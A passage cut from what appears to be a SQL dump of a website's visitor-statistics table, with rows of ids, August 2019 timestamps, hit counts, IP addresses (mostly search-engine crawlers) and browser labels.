1566431524,1,1,0,0,'66.249.66.138','chrome'),(443710,1566431798,1,1,0,0,'141.8.188.11','other'),(443711,1566432693,1,1,0,0,'207.46.13.160','other'),(443712,1566432725,1,1,0,0,'8.29.198.26','other'),(443713,1566433730,1,1,0,0,'66.249.66.64','chrome'),(443714,1566434645,1,1,0,0,'207.46.13.162','other'),(443715,1566434761,1,1,0,0,'66.249.66.66','chrome'),(443716,1566435775,1,1,0,0,'5.45.207.19','other'),(443717,1566435822,1,1,0,0,'66.249.66.136','chrome'),(443718,1566436167,3,3,0,0,'66.249.66.134','chrome'),(443719,1566436337,1,1,0,0,'54.36.149.14','other'),(443720,1566436348,1,1,0,0,'54.36.149.55','other'),(443721,1566436784,2,2,0,0,'66.249.66.136','chrome'),(443722,1566436805,2,2,0,0,'66.249.66.138','chrome'),(443723,1566437470,2,2,0,0,'66.249.66.134','chrome'),(443724,1566437666,1,1,0,0,'66.249.66.66','chrome'),(443725,1566438297,1,1,0,0,'40.77.167.208','other'),(443726,1566438470,1,1,0,0,'66.249.66.138','chrome'),(443727,1566438493,1,1,0,0,'38.99.62.94','other'),(443728,1566438911,1,1,0,0,'157.55.39.154','other'),(443729,1566439069,1,1,0,0,'66.249.66.64','chrome'),(443730,1566439083,1,1,0,0,'54.36.149.23','other'),(443731,1566439134,1,1,0,0,'66.249.66.134','chrome'),(443732,1566439349,1,1,0,0,'178.171.47.73','chrome'),(443733,1566439480,1,1,0,0,'207.46.13.21','other'),(443734,1566439710,1,1,0,0,'66.249.66.138','chrome'),(443735,1566440213,1,1,0,0,'54.36.149.67','other'),(443736,1566440318,1,1,0,0,'66.249.66.66','chrome'),(443737,1566440353,1,1,0,0,'40.77.167.131','other'),(443738,1566440405,3,3,0,0,'66.249.66.136','chrome'),(443739,1566440498,1,1,0,0,'37.9.113.103','other'),(443740,1566440502,1,1,0,0,'37.9.113.148','other'),(443741,1566440544,3,3,0,0,'66.249.66.134','chrome'),(443742,1566440880,1,1,0,0,'40.77.167.208','other'),(443743,1566440898,2,2,0,0,'66.249.66.138','chrome'),(443744,1566441174,1,1,0,0,'66.249.66.68','chrome'),(443745,1566441526,2,2,0,0,'66.249.66.136','chrome'),(443746,1566441533,1,1,0,0,'66.249.66.64','chrome'),(443747,1566441606,1,1,0,0,'8.29.198.27','other'),(443748,1566441743,1,1,0,0,'37.9.113.148','other'),(443749,1566442219,1,1,0,0,'54.36.149.62','other'),(443750,1566442936,1,1,0,0,'5.45.207.79','other'),(443751,1566443135,1,1,0,0,'66.249.66.136','chrome'),(443752,1566443544,2,2,0,0,'66.249.66.134','chrome'),(443753,1566443549,1,1,0,0,'8.29.198.25','other'),(443754,1566444145,1,1,0,0,'66.249.66.138','chrome'),(443755,1566444606,1,1,0,0,'66.249.66.134','chrome'),(443756,1566445013,1,1,0,0,'54.36.149.30','other'),(443757,1566445542,1,1,0,0,'141.8.188.11','other'),(443758,1566445610,2,1,1,0,'66.249.66.136',''),(443759,1566445670,1,1,0,0,'54.36.149.46','other'),(443760,1566445863,1,1,0,0,'46.133.255.148','chrome'),(443761,1566446261,1,0,1,0,'66.249.66.138',''),(443762,1566446363,1,1,0,0,'46.211.104.67','chrome'),(443763,1566446378,1,1,0,0,'95.24.4.47','msie'),(443764,1566446807,2,1,1,0,'66.249.66.136',''),(443765,1566447611,1,1,0,0,'54.36.149.102','other'),(443766,1566447767,1,1,0,0,'66.249.66.136','chrome'),(443767,1566448560,2,2,0,0,'66.249.66.138','chrome'),(443768,1566448694,1,1,0,0,'91.196.178.133','firefox'),(443769,1566448767,1,1,0,0,'193.106.30.99','chrome'),(443770,1566448977,2,2,0,0,'66.249.66.134','chrome'),(443771,1566449108,1,1,0,0,'66.249.66.64','chrome'),(443772,1566449336,1,1,0,0,'54.36.149.107','other'),(443773,1566450932,1,1,0,0,'66.249.66.136','chrome'),(443774,1566450994,3,3,0,0,'66.249.66.138','chrome'),(443775,1566451520,1,1,0,0,'66.249.66.134','chrome'),(443776,1566451783,1,1,0,0,'157.55.39.154','other'),(443777,1566452456,1,1,0,0,'8.29.198.27','other'),(443778,1566452592,1,1,0,0,'54.36.149.93','other'),(443779,1566452796,1,1,0,0,'141.8.188.11','other'),(443780,1566452831,1,1,0,0,'141.8.188.29','other'),(443781,1566453045,2,2,0,0,'40.77.167.138','other'),(443782,1566453367,1,1,0,0,'185.220.101.60','other'),(443783,1566453397,2,2,0,0,'66.249.66.134','chrome'),(443784,1566453570,1,1,0,0,'46.211.68.67','chrome'),(443785,1566453579,1,1,0,0,'54.36.149.95','other'),(443786,1566453766,1,1,0,0,'66.249.66.68','chrome'),(443787,1566454223,1,1,0,0,'66.249.66.136','chrome'),(443788,1566454300,1,1,0,0,'141.8.188.11','other'),(443789,1566454375,1,1,0,0,'8.29.198.26','other'),(443790,1566454589,1,1,0,0,'5.45.207.79','other'),(443791,1566454707,1,1,0,0,'54.36.149.58','other'),(443792,1566455172,2,2,0,0,'66.249.66.136','chrome'),(443793,1566455381,1,1,0,0,'141.8.188.29','other'),(443794,1566456502,1,1,0,0,'66.249.66.68','chrome'),(443795,1566456732,1,1,0,0,'40.77.167.180','other'),(443796,1566457321,1,1,0,0,'66.249.66.134','chrome'),(443797,1566457722,1,1,0,0,'66.249.66.138','chrome'),(443798,1566457809,1,1,0,0,'66.249.66.68','chrome'),(443799,1566458311,2,2,0,0,'40.77.167.138','other'),(443800,1566458440,1,1,0,0,'5.45.207.79','other'),(443801,1566458562,3,3,0,0,'66.249.66.134','chrome'),(443802,1566458927,1,1,0,0,'54.36.149.53','other'),(443803,1566459200,1,1,0,0,'54.36.149.26','other'),(443804,1566459265,1,1,0,0,'54.36.149.76','other'),(443805,1566459530,1,1,0,0,'54.36.149.84','other'),(443806,1566459590,1,1,0,0,'40.77.167.180','other'),(443807,1566459600,1,1,0,0,'128.124.11.140','chrome'),(443808,1566459654,3,3,0,0,'66.249.66.134','chrome'),(443809,1566460095,1,1,0,0,'207.46.13.150','other'),(443810,1566460424,1,1,0,0,'66.249.66.136','chrome'),(443811,1566460587,1,1,0,0,'54.36.149.21','other'),(443812,1566460799,1,1,0,0,'54.36.149.7','other'),(443813,1566460875,1,1,0,0,'40.77.167.180','other'),(443814,1566460944,1,1,0,0,'141.8.188.29','other'),(443815,1566460990,1,1,0,0,'66.249.66.138','chrome'),(443816,1566462363,1,1,0,0,'54.36.149.7','other'),(443817,1566462491,1,1,0,0,'40.77.167.180','other'),(443818,1566462629,1,1,0,0,'66.249.66.138','chrome'),(443819,1566462649,1,1,0,0,'66.249.66.134','chrome'),(443820,1566463020,1,1,0,0,'91.196.179.33','chrome'),(443821,1566463203,1,1,0,0,'51.15.109.127','firefox'),(443822,1566463247,1,1,0,0,'13.66.139.0','other'),(443823,1566463304,1,1,0,0,'8.29.198.25','other'),(443824,1566463476,2,2,0,0,'207.46.13.150','other'),(443825,1566463531,3,3,0,0,'66.249.66.136','chrome'),(443826,1566463960,1,1,0,0,'185.210.85.113','chrome'),(443827,1566463981,1,1,0,0,'5.45.207.19','other'),(443828,1566464198,1,1,0,0,'66.249.66.68','chrome'),(443829,1566464675,1,1,0,0,'66.249.66.136','chrome'),(443830,1566465198,1,1,0,0,'8.29.198.25','other'),(443831,1566465406,1,1,0,0,'40.77.167.138','other'),(443832,1566465449,1,1,0,0,'141.8.188.11','other'),(443833,1566465897,1,1,0,0,'40.77.167.180','other'),(443834,1566466062,1,1,0,0,'91.196.178.169','chrome'),(443835,1566466347,1,1,0,0,'54.36.149.1','other'),(443836,1566466633,1,1,0,0,'128.124.33.108','other'),(443837,1566466840,1,1,0,0,'207.46.13.150','other'),(443838,1566467058,1,1,0,0,'66.249.66.134','chrome'),(443839,1566467988,1,1,0,0,'54.36.149.44','other'),(443840,1566468409,1,1,0,0,'91.196.179.33','firefox'),(443841,1566468737,1,1,0,0,'54.36.149.17','other'),(443842,1566469060,1,1,0,0,'141.8.188.11','other'),(443843,1566469168,1,1,0,0,'54.36.149.34','other'),(443844,1566469611,1,1,0,0,'109.74.154.72','chrome'),(443845,1566470161,1,1,0,0,'66.249.66.64','chrome'),(443846,1566470284,1,1,0,0,'66.249.66.136','chrome'),(443847,1566470641,2,2,0,0,'40.77.167.180','other'),(443848,1566470946,1,1,0,0,'54.36.149.26','other'),(443849,1566471017,1,1,0,0,'54.36.149.52','other'),(443850,1566471252,1,1,0,0,'94.100.221.234','chrome'),(443851,1566471315,1,1,0,0,'54.36.149.63','other'),(443853,1566471654,1,1,0,0,'141.8.188.11','other'),(443854,1566471918,1,1,0,0,'54.36.149.69','other'),(443855,1566472278,1,1,0,0,'213.180.203.17','other'),(443856,1566472286,1,1,0,0,'141.8.142.144','other'),(443857,1566472504,1,1,0,0,'91.196.178.184','chrome'),(443858,1566472653,1,1,0,0,'54.36.149.74','other'),(443859,1566472914,1,1,0,0,'54.36.149.0','other'),(443860,1566473174,2,2,0,0,'66.249.66.134','chrome'),(443861,1566473360,4,4,0,0,'66.249.66.138','chrome'),(443862,1566473497,3,3,0,0,'66.249.66.136','chrome'),(443863,1566473609,1,1,0,0,'40.77.167.180','other'),(443864,1566473964,1,1,0,0,'54.36.149.26','other'),(443865,1566474157,1,1,0,0,'8.29.198.27','other'),(443866,1566474273,1,1,0,0,'193.106.30.99','chrome'),(443867,1566474717,3,3,0,0,'66.249.66.134','chrome'),(443868,1566474834,1,1,0,0,'54.36.149.81','other'),(443869,1566475209,1,1,0,0,'66.249.66.138','chrome'),(443870,1566475413,1,1,0,0,'54.36.149.7','other'),(443871,1566475495,1,1,0,0,'5.45.207.79','other'),(443872,1566475847,2,2,0,0,'66.249.66.134','chrome'),(443873,1566475875,1,1,0,0,'66.249.66.68','chrome'),(443874,1566475903,1,1,0,0,'54.36.149.60','other'),(443875,1566476025,1,1,0,0,'8.29.198.25','other'),(443876,1566476754,1,1,0,0,'66.249.66.136','chrome'),(443877,1566477215,1,1,0,0,'66.249.66.68','chrome'),(443878,1566477270,1,1,0,0,'66.249.66.138','chrome'),(443879,1566477290,1,1,0,0,'207.46.13.132','other'),(443880,1566477298,3,3,0,0,'66.249.66.134','chrome'),(443881,1566477366,1,1,0,0,'213.180.203.40','other'),(443882,1566477535,1,1,0,0,'66.249.66.66','chrome'),(443883,1566477550,1,1,0,0,'66.249.66.64','chrome'),(443884,1566478067,1,1,0,0,'54.36.149.38','other'),(443885,1566478676,1,1,0,0,'91.196.159.42','chrome'),(443886,1566479029,1,1,0,0,'213.111.122.68','chrome'),(443887,1566479245,1,1,0,0,'178.154.171.27','other'),(443888,1566479391,1,1,0,0,'66.249.66.134','chrome'),(443889,1566479443,1,1,0,0,'66.249.66.136','chrome'),(443890,1566479825,1,1,0,0,'54.36.149.97','other'),(443891,1566480171,2,2,0,0,'66.249.66.138','chrome'),(443892,1566480273,1,1,0,0,'87.250.224.118','other'),(443893,1566481048,1,1,0,0,'54.36.149.35','other'),(443894,1566481170,1,1,0,0,'66.249.66.64','chrome'),(443895,1566481361,1,1,0,0,'91.196.178.169','chrome'),(443896,1566482120,1,1,0,0,'141.8.132.16','other'),(443897,1566482168,1,1,0,0,'66.249.66.138','chrome'),(443898,1566482774,2,2,0,0,'66.249.66.134','chrome'),(443899,1566482804,1,1,0,0,'54.36.149.55','other'),(443900,1566482857,1,1,0,0,'207.46.13.39','other'),(443901,1566483709,1,1,0,0,'40.77.167.27','other'),(443902,1566483714,1,1,0,0,'141.8.188.29','other'),(443903,1566483717,1,1,0,0,'5.45.207.79','other'),(443904,1566484187,1,1,0,0,'66.249.66.138','chrome'),(443905,1566484344,3,3,0,0,'66.249.66.134','chrome'),(443906,1566484746,1,1,0,0,'141.8.188.11','other'),(443907,1566484828,1,1,0,0,'134.209.104.122','firefox'),(443908,1566484920,1,1,0,0,'141.8.188.29','other'),(443909,1566484922,1,1,0,0,'54.36.149.79','other'),(443910,1566485013,1,1,0,0,'8.29.198.25','other'),(443911,1566485058,1,1,0,0,'66.249.66.136','chrome'),(443912,1566485535,1,1,0,0,'40.77.167.27','other'),(443913,1566485678,4,4,0,0,'66.249.66.134','chrome'),(443914,1566486001,1,1,0,0,'66.249.66.136','chrome'),(443915,1566486181,1,1,0,0,'54.36.149.63','other'),(443916,1566486718,1,1,0,0,'66.249.66.66','chrome'),(443917,1566486851,1,1,0,0,'8.29.198.27','other'),(443918,1566487020,1,1,0,0,'157.55.39.113','other'),(443919,1566487924,1,1,0,0,'178.154.171.27','other'),(443920,1566488201,2,2,0,0,'66.249.66.136','chrome'),(443921,1566488489,1,1,0,0,'157.55.39.113','other'),(443922,1566488671,2,2,0,0,'40.77.167.27','other'),(443923,1566488814,1,1,0,0,'207.46.13.132','other'),(443924,1566489212,3,3,0,0,'66.249.66.136','chrome'),(443925,1566489343,3,3,0,0,'66.249.66.134','chrome'),(443926,1566490230,1,1,0,0,'66.249.66.138','chrome'),(443927,1566490231,1,1,0,0,'66.249.66.68','chrome'),(443928,1566490615,3,3,0,0,'66.249.66.134','chrome'),(443929,1566491299,1,1,0,0,'66.249.66.66','chrome'),(443930,1566491581,1,1,0,0,'66.249.66.134','chrome'),(443931,1566492090,1,1,0,0,'157.55.39.113','other'),(443932,1566492212,1,1,0,0,'66.249.66.136','chrome'),(443933,1566492264,1,1,0,0,'54.36.149.66','other'),(443934,1566492289,1,1,0,0,'77.37.143.86','chrome'),(443935,1566492492,1,1,0,0,'54.36.149.103','other'),(443936,1566493079,3,3,0,0,'157.55.39.113','other'),(443937,1566493231,1,1,0,0,'207.46.13.39','other'),(443938,1566493236,2,2,0,0,'207.46.13.132','other'),(443939,1566493254,1,1,0,0,'54.36.149.36','other'),(443940,1566493565,1,1,0,0,'66.249.66.136','chrome'),(443941,1566493753,1,1,0,0,'54.36.149.58','other'),(443942,1566493763,1,1,0,0,'95.132.11.222','other'),(443943,1566493924,1,1,0,0,'95.108.181.54','other'),(443944,1566494275,2,2,0,0,'66.249.66.134','chrome'),(443945,1566494295,2,2,0,0,'66.249.66.138','chrome'),(443946,1566494665,1,1,0,0,'207.46.13.132','other'),(443947,1566494705,2,2,0,0,'66.249.66.136','chrome'),(443948,1566494740,1,1,0,0,'157.55.39.113','other'),(443949,1566495335,1,1,0,0,'66.249.66.68','chrome'),(443950,1566495414,1,1,0,0,'54.36.149.39','other'),(443951,1566495562,1,1,0,0,'141.8.188.29','other'),(443952,1566495642,1,1,0,0,'66.249.66.138','chrome'),(443953,1566495846,1,1,0,0,'8.29.198.25','other'),(443954,1566495970,1,1,0,0,'66.249.66.66','chrome'),(443955,1566496051,1,1,0,0,'54.36.149.51','other'),(443956,1566496178,1,1,0,0,'207.46.13.132','other'),(443957,1566496195,1,1,0,0,'157.55.39.113','other'),(443958,1566496253,1,1,0,0,'54.36.149.0','other'),(443959,1566496432,1,1,0,0,'54.36.149.63','other'),(443960,1566496450,1,1,0,0,'5.45.207.8','other'),(443961,1566496549,1,1,0,0,'66.249.66.64','chrome'),(443962,1566496893,2,2,0,0,'66.249.66.138','chrome'),(443963,1566497680,1,1,0,0,'8.29.198.26','other'),(443964,1566497823,1,1,0,0,'66.249.66.66','chrome'),(443965,1566497824,1,1,0,0,'66.249.66.134','chrome'),(443966,1566497873,1,1,0,0,'54.36.149.17','other'),(443967,1566497972,1,1,0,0,'66.249.66.136','chrome'),(443968,1566498241,1,1,0,0,'193.106.30.99','chrome'),(443969,1566498694,1,1,0,0,'207.46.13.132','other'),(443970,1566498927,1,1,0,0,'91.196.178.58','chrome'),(443971,1566499060,1,1,0,0,'54.36.149.13','other'),(443972,1566500023,1,1,0,0,'157.55.39.113','other'),(443973,1566500267,1,1,0,0,'141.8.142.144','other'),(443974,1566500336,2,2,0,0,'207.46.13.39','other'),(443975,1566500620,1,1,0,0,'54.36.149.104','other'),(443976,1566500884,1,1,0,0,'66.249.66.138','chrome'),(443977,1566501085,1,1,0,0,'141.8.142.38','other'),(443978,1566501183,1,1,0,0,'66.249.66.134','chrome'),(443979,1566501272,1,1,0,0,'157.55.39.113','other'),(443980,1566501360,1,1,0,0,'54.36.149.54','other'),(443981,1566501557,3,3,0,0,'66.249.66.136','chrome'),(443982,1566502203,1,1,0,0,'66.249.66.134','chrome'),(443983,1566502224,1,1,0,0,'207.46.13.205','other'),(443984,1566502356,1,1,0,0,'54.36.149.13','other'),(443985,1566502799,1,1,0,0,'66.249.66.136','chrome'),(443986,1566502824,1,1,0,0,'54.36.149.6','other'),(443987,1566503257,1,1,0,0,'66.249.66.66','chrome'),(443988,1566503510,1,1,0,0,'207.46.13.132','other'),(443989,1566503610,2,2,0,0,'66.249.66.134','chrome'),(443990,1566503858,2,2,0,0,'66.249.66.136','chrome'),(443991,1566504448,1,1,0,0,'66.249.66.64','chrome'),(443992,1566504629,2,2,0,0,'207.46.13.132','other'),(443993,1566504668,1,1,0,0,'157.55.39.113','other'),(443994,1566504773,1,1,0,0,'54.36.149.48','other'),(443995,1566505035,1,1,0,0,'66.249.66.134','chrome'),(443996,1566505300,1,1,0,0,'66.249.66.138','chrome'),(443997,1566505760,1,1,0,0,'207.46.13.132','other'),(443998,1566506203,1,1,0,0,'54.36.149.31','other'),(443999,1566506553,2,2,0,0,'66.249.66.64','chrome'),(444000,1566506573,1,1,0,0,'157.55.39.113','other'),(444001,1566506681,1,1,0,0,'54.36.149.4','other'),(444002,1566506683,1,1,0,0,'8.29.198.25','other'),(444003,1566506690,1,1,0,0,'66.249.66.138','chrome'),(444004,1566506894,1,1,0,0,'91.196.178.188','chrome'),(444005,1566507077,2,2,0,0,'66.249.66.134','chrome'),(444006,1566507259,1,1,0,0,'54.36.149.53','other'),(444007,1566507800,2,2,0,0,'66.249.66.136','chrome'),(444008,1566508059,48,48,0,0,'173.212.245.240','other'),(444009,1566508429,20,20,0,0,'78.46.105.172','other'),(444010,1566508515,1,1,0,0,'8.29.198.27','other'),(444011,1566508742,1,1,0,0,'157.55.39.146','other'),(444012,1566508860,1,1,0,0,'66.249.66.134','chrome'),(444013,1566508937,1,1,0,0,'66.249.66.66','chrome'),(444014,1566509750,1,1,0,0,'66.249.66.136','chrome'),(444015,1566509889,1,1,0,0,'54.36.149.37','other'),(444016,1566509921,1,1,0,0,'35.238.153.198','other'),(444017,1566510683,1,1,0,0,'54.36.149.58','other'),(444018,1566511007,1,1,0,0,'54.36.149.103','other'),(444019,1566511290,2,2,0,0,'66.249.66.134','chrome'),(444020,1566511433,2,2,0,0,'157.55.39.200','other'),(444021,1566511560,2,2,0,0,'66.249.66.138','chrome'),(444022,1566511786,1,1,0,0,'5.45.207.19','other'),(444023,1566512949,3,3,0,0,'66.249.66.138','chrome'),(444024,1566512994,1,1,0,0,'54.36.149.40','other'),(444025,1566513134,1,1,0,0,'66.249.66.64','chrome'),(444026,1566513190,1,1,0,0,'54.36.149.36','other'),(444027,1566513559,3,3,0,0,'66.249.66.136','chrome'),(444028,1566513901,1,1,0,0,'60.191.38.77','firefox'),(444029,1566513950,3,3,0,0,'66.249.66.134','chrome'),(444030,1566514101,1,1,0,0,'157.55.39.146','other'),(444031,1566514182,2,2,0,0,'66.249.66.138','chrome'),(444032,1566514536,1,1,0,0,'66.249.66.68','chrome'),(444033,1566515510,2,2,0,0,'66.249.66.66','chrome'),(444034,1566515703,3,3,0,0,'66.249.66.138','chrome'),(444035,1566515707,1,1,0,0,'66.249.66.136','chrome'),(444036,1566515804,1,1,0,0,'60.191.38.77','firefox'),(444037,1566515845,2,2,0,0,'66.249.66.134','chrome'),(444038,1566516295,1,1,0,0,'66.249.66.68','chrome'),(444039,1566516337,35,35,0,0,'95.216.15.225','other'),(444040,1566517051,1,1,0,0,'66.249.66.136','chrome'),(444041,1566517082,1,1,0,0,'157.55.39.200','other'),(444042,1566517239,10,10,0,0,'95.216.15.225','other'),(444043,1566517540,1,1,0,0,'8.29.198.25','other'),(444044,1566517715,1,1,0,0,'54.36.149.63','other'),(444045,1566517790,1,1,0,0,'66.249.66.138','chrome'),(444046,1566518597,1,1,0,0,'87.250.224.64','other'),(444047,1566518708,1,1,0,0,'54.36.149.93','other'),(444048,1566518803,1,1,0,0,'40.77.167.48','other'),(444049,1566519335,1,1,0,0,'66.249.66.68','chrome'),(444050,1566519343,1,1,0,0,'8.29.198.27','other'),(444051,1566519706,1,1,0,0,'40.77.167.48','other'),(444052,1566519771,1,1,0,0,'66.249.66.66','chrome'),(444053,1566520101,1,1,0,0,'141.8.188.29','other'),(444054,1566520283,1,1,0,0,'209.17.96.90','other'),(444055,1566520365,1,1,0,0,'66.249.66.136','chrome'),(444056,1566520575,1,1,0,0,'66.249.66.134','chrome'),(444057,1566520644,1,1,0,0,'54.36.149.31','other'),(444058,1566520833,1,1,0,0,'54.36.149.60','other'),(444059,1566521180,2,2,0,0,'40.77.167.48','other'),(444060,1566521187,2,2,0,0,'207.46.13.193','other'),(444061,1566521193,1,1,0,0,'207.46.13.210','other'),(444062,1566521391,1,1,0,0,'54.36.149.0','other'),(444063,1566521519,1,1,0,0,'54.36.149.34','other'),(444064,1566521537,1,1,0,0,'66.249.66.134','chrome'),(444065,1566521688,1,1,0,0,'66.249.66.138','chrome'),(444066,1566521746,1,1,0,0,'40.77.167.126','other'),(444067,1566522011,1,1,0,0,'54.36.149.5','other'),(444068,1566522341,1,1,0,0,'54.36.149.20','other'),(444069,1566522762,1,1,0,0,'54.36.149.68','other'),(444070,1566522823,1,1,0,0,'54.36.149.83','other'),(444071,1566523504,1,1,0,0,'66.249.66.136','chrome'),(444072,1566526509,1,1,0,0,'157.55.39.51','other'),(444073,1566527328,1,1,0,0,'40.77.167.126','other'),(444074,1566527719,1,1,0,0,'66.249.66.138','chrome'),(444075,1566528151,1,1,0,0,'95.108.181.54','other'),(444076,1566528154,1,1,0,0,'5.45.207.8','other'),(444077,1566528186,2,2,0,0,'66.249.66.136','chrome'),(444078,1566528213,1,1,0,0,'95.132.11.222','other'),(444079,1566528273,1,1,0,0,'54.36.149.73','other'),(444080,1566528377,1,1,0,0,'8.29.198.27','other'),(444081,1566528964,1,1,0,0,'157.55.39.251','other'),(444082,1566528987,1,1,0,0,'52.11.156.25','other'),(444083,1566529310,1,1,0,0,'66.249.66.138','chrome'),(444084,1566529482,1,1,0,0,'141.8.188.11','other'),(444085,1566529575,1,1,0,0,'54.36.149.26','other'),(444086,1566529760,1,1,0,0,'66.249.66.134','chrome'),(444087,1566530175,1,1,0,0,'8.29.198.26','other'),(444088,1566530279,1,1,0,0,'157.55.39.251','other'),(444089,1566530782,1,1,0,0,'54.36.149.94','other'),(444090,1566530854,1,1,0,0,'54.36.149.82','other'),(444091,1566530929,1,1,0,0,'66.249.66.68','chrome'),(444092,1566531095,1,1,0,0,'54.36.149.37','other'),(444093,1566531413,1,1,0,0,'141.8.188.11','other'),(444094,1566531516,1,1,0,0,'66.249.66.134','chrome'),(444095,1566531562,1,1,0,0,'66.249.66.136','chrome'),(444096,1566533299,1,1,0,0,'40.77.167.126','other'),(444097,1566533546,1,1,0,0,'157.55.39.251','other'),(444098,1566533575,1,1,0,0,'37.9.113.148','other'),(444099,1566534998,1,1,0,0,'54.36.149.41','other'),(444100,1566535256,1,1,0,0,'54.36.149.78','other'),(444101,1566535434,1,1,0,0,'91.196.178.131','firefox'),(444102,1566535459,1,1,0,0,'141.8.188.29','other'),(444103,1566536019,2,2,0,0,'66.249.66.138','chrome'),(444104,1566536047,1,1,0,0,'46.211.132.153','chrome'),(444105,1566536062,1,1,0,0,'141.8.142.103','other'),(444106,1566536199,1,1,0,0,'54.36.149.1','other'),(444107,1566536320,1,1,0,0,'66.249.66.136','chrome'),(444108,1566536467,1,1,0,0,'54.36.149.12','other'),(444109,1566536497,1,1,0,0,'5.45.207.76','other'),(444110,1566536602,1,1,0,0,'54.36.149.16','other'),(444111,1566537061,1,1,0,0,'66.249.66.134','chrome'),(444112,1566537382,1,1,0,0,'157.55.39.251','other'),(444113,1566537879,1,1,0,0,'66.249.66.136','chrome'),(444114,1566538291,1,1,0,0,'46.211.130.110','chrome'),(444115,1566538559,1,1,0,0,'109.70.100.28','other'),(444116,1566538688,1,1,0,0,'46.211.68.243','chrome'),(444117,1566538952,1,1,0,0,'66.249.66.138','chrome'),(444118,1566539214,1,1,0,0,'8.29.198.26','other'),(444119,1566539839,1,1,0,0,'66.249.66.134','chrome'),(444120,1566540376,1,1,0,0,'107.21.1.8','other'),(444121,1566540378,1,1,0,0,'54.208.102.37','other'),(444122,1566540379,2,2,0,0,'62.216.206.161','other'),(444123,1566540488,1,1,0,0,'54.36.149.82','other'),(444124,1566541011,1,1,0,0,'8.29.198.27','other'),(444125,1566541277,1,1,0,0,'54.36.149.95','other'),(444126,1566542426,1,1,0,0,'66.249.66.136','chrome'),(444127,1566542875,1,1,0,0,'178.154.200.8','other'),(444128,1566542896,2,2,0,0,'66.249.66.138','chrome'),(444129,1566543025,1,1,0,0,'54.36.149.24','other'),(444130,1566543362,1,1,0,0,'54.36.149.37','other'),(444131,1566543419,1,1,0,0,'207.46.13.107','other'),(444132,1566543760,1,1,0,0,'193.106.30.99','chrome'),(444133,1566543786,1,1,0,0,'54.36.149.66','other'),(444134,1566543852,1,1,0,0,'66.249.66.134','chrome'),(444135,1566544270,1,1,0,0,'54.36.149.46','other'),(444136,1566544730,1,1,0,0,'66.249.66.136','chrome'),(444137,1566545029,4,4,0,0,'157.55.39.51','other'),(444138,1566545033,4,4,0,0,'207.46.13.107','other'),(444139,1566545097,4,4,0,0,'157.55.39.251','other'),(444140,1566545107,3,3,0,0,'157.55.39.231','other'),(444141,1566546146,2,2,0,0,'157.55.39.231','other'),(444142,1566546306,1,1,0,0,'80.91.163.165','chrome'),(444143,1566546897,1,1,0,0,'66.249.66.136','chrome'),(444144,1566546971,1,1,0,0,'213.180.203.17','other'),(444145,1566547411,1,1,0,0,'157.55.39.51','other'),(444146,1566547677,2,2,0,0,'66.249.66.66','chrome'),(444147,1566547750,1,0,1,0,'66.249.66.64',''),(444148,1566547915,1,1,0,0,'157.55.39.57','other'),(444149,1566548182,1,1,0,0,'66.249.66.64','chrome'),(444150,1566548218,1,1,0,0,'54.36.149.37','other'),(444151,1566548605,1,1,0,0,'54.36.149.36','other'),(444152,1566548951,2,2,0,0,'66.249.66.138','chrome'),(444153,1566550054,1,1,0,0,'8.29.198.25','other'),(444154,1566550648,1,1,0,0,'207.46.13.107','other'),(444155,1566550653,1,1,0,0,'13.66.139.0','other'),(444156,1566550881,1,1,0,0,'66.249.66.134','chrome'),(444157,1566550908,2,2,0,0,'66.249.66.136','chrome'),(444158,1566550982,1,1,0,0,'66.249.66.138','chrome'),(444159,1566551841,1,1,0,0,'8.29.198.26','other'),(444160,1566552743,2,2,0,0,'157.55.39.231','other'),(444161,1566553184,3,3,0,0,'66.249.66.134','chrome'),(444162,1566553220,1,1,0,0,'54.36.149.21','other'),(444163,1566553240,1,1,0,0,'157.55.39.57','other'),(444164,1566553261,1,1,0,0,'93.183.251.231','chrome'),(444165,1566553464,1,1,0,0,'40.77.167.30','other'),(444166,1566554224,2,2,0,0,'66.249.66.136','chrome'),(444167,1566554570,1,1,0,0,'207.46.13.107','other'),(444168,1566554995,2,2,0,0,'95.108.213.4','other'),(444169,1566555403,1,1,0,0,'66.249.66.136','chrome'),(444170,1566555465,1,1,0,0,'66.249.66.138','chrome'),(444171,1566555779,1,1,0,0,'109.74.154.72','chrome'),(444172,1566555907,2,2,0,0,'66.249.66.134','chrome'),(444173,1566556021,1,1,0,0,'54.36.149.85','other'),(444174,1566556910,1,1,0,0,'54.36.149.8','other'),(444175,1566557303,1,1,0,0,'66.249.66.134','chrome'),(444176,1566557612,1,1,0,0,'66.249.66.64','chrome'),(444177,1566558805,1,1,0,0,'91.196.178.74','firefox'),(444178,1566559104,1,1,0,0,'66.249.66.64','chrome'),(444179,1566559761,2,2,0,0,'66.249.66.136','chrome'),(444180,1566559820,1,1,0,0,'66.249.66.138','chrome'),(444181,1566560192,1,1,0,0,'66.249.66.66','chrome'),(444182,1566560898,1,1,0,0,'8.29.198.26','other'),(444183,1566561735,1,1,0,0,'131.100.193.40','chrome'),(444184,1566562355,1,1,0,0,'178.92.159.162','firefox'),(444185,1566562665,1,1,0,0,'8.29.198.27','other'),(444186,1566562734,1,1,0,0,'66.249.66.64','chrome'),(444187,1566562979,1,1,0,0,'207.46.13.130','other'),(444188,1566563663,2,2,0,0,'66.249.66.136','chrome'),(444189,1566563743,1,1,0,0,'66.249.66.64','chrome'),(444190,1566563916,1,1,0,0,'54.36.149.42','other'),(444191,1566564038,1,1,0,0,'40.77.167.49','other'),(444192,1566564317,1,1,0,0,'66.249.66.134','chrome'),(444193,1566564512,1,1,0,0,'46.211.121.181','chrome'),(444194,1566564571,1,1,0,0,'66.249.66.136','chrome'),(444195,1566565962,1,1,0,0,'157.55.39.192','other'),(444196,1566566728,1,1,0,0,'66.249.66.134','chrome'),(444197,1566567169,1,1,0,0,'87.250.224.118','other'),(444198,1566567552,2,2,0,0,'66.249.66.138','chrome'),(444199,1566568306,1,1,0,0,'91.196.178.91','firefox'),(444200,1566568309,1,1,0,0,'5.45.207.8','other'),(444201,1566568539,1,1,0,0,'66.249.66.134','chrome'),(444202,1566568781,1,1,0,0,'213.180.203.61','other'),(444203,1566568906,1,1,0,0,'95.108.213.4','other'),(444204,1566569153,1,1,0,0,'178.154.171.27','other'),(444205,1566569231,1,1,0,0,'207.46.13.126','other'),(444206,1566569411,1,1,0,0,'141.8.142.162','other'),(444207,1566569646,1,1,0,0,'66.249.66.138','chrome'),(444208,1566569673,1,1,0,0,'54.36.149.86','other'),(444209,1566569905,2,2,0,0,'141.8.188.29','other'),(444210,1566570710,1,1,0,0,'157.55.39.192','other'),(444211,1566571740,1,1,0,0,'8.29.198.25','other'),(444212,1566571761,